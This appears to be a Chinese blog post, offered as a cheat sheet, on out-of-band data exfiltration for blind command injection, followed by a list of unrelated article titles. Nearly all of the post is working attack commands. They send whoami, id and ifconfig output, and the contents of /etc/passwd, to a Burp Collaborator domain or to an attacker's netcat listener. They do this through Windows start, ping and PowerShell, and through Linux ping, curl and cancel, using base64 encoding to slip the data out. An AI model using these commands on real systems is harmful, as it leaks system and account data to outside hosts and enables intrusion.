windows下通过start命令

for /F %X in ('whoami') do start http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/%X

会使用默认浏览器打开http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/laptop-k77ue954/hp

从burpsuite get请求的uri可以看到whoami内容.

windows下通过ping命令

for /F %i in ('whoami') do ping -n 1 %i.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

发现当当前用户名中带有\时会出现找不到主机,因为域名不可能存在\字符,随采用下面命令更为妥当。

for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

这样把\做分隔符取后面的值ping只显示出hp。

windows存在powershell的情况下

使用powershell进行base64编码并进行http请求

for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/'+$a);

linux下通过ping命令

ping `whoami`.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

ping命令结合base64编码

ping $(id|base64).uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

linux下通过curl命令

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/`whoami`

curl命令结合base64编码

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/$(id|base64)

遇到有换行等情况下把\n替换为-

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/$(ifconfig|base64|tr '\n' '-')



复制出来把-替换为空

然后base64解码

linux下使用curl -F参数

curl -X POST -F xx=@passwd http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

linux下使用cancel命令

攻击机nc监听一个端口,靶机执行命令

cancel -u "$(cat /etc/passwd)" -h xxx.2x0.xxx.69:2333

最新文章

  1. dd——留言板再加验证码功能
  2. Canvas基础
  3. FineUI(专业版)高清大图赏析!(第二波)
  4. InternalsVisibleToAttribute——把internal成员暴露给指定的友元程序集
  5. PHP 使用 OSS 批量上传图片
  6. CentOS6.4 利用sendEmail发邮件
  7. freemarker实例2
  8. HttpClient设置代理,超时,以及得到cookies
  9. 【Linux常用工具】1.1 diff命令的三种格式
  10. C语言格式化输出,空位补0,空位补空格
  11. cocos项目导入其它源文件时加入依赖库时,头文件提示找不到文件夹中的文件
  12. Spring Boot 系列教程17-Cache-缓存
  13. 青否云 - 小程序待办事项 wxapp开源系统
  14. 微信小程序-表单笔记
  15. Golang 入门~~基础知识
  16. python---ORM之SQLAlchemy(5)联合唯一的使用
  17. 010 处理模型数据(ModelAndView,Map Model,@SessionAttributes)
  18. Laravel 日期时间处理包 Carbon 的应用
  19. 面向对象程序设计_课堂作业_01_Circle
  20. VS+SVN版本控制

热门文章

  1. C#使用phantomjs 进行网页整页截屏
  2. 201903-2 CCF 二十四点
  3. Alisha’s Party
  4. BUUCTF | [CISCN2019 华北赛区 Day1 Web2]ikun
  5. laravel5.6操作数据curd写法(查询构建器)
  6. scau 1142 巡逻的士兵(分治)
  7. php面试专题---MYSQL查询语句优化
  8. Git011--分支管理策略
  9. python datetime模块的strftime()
  10. java调用数据库中的函数和存储过程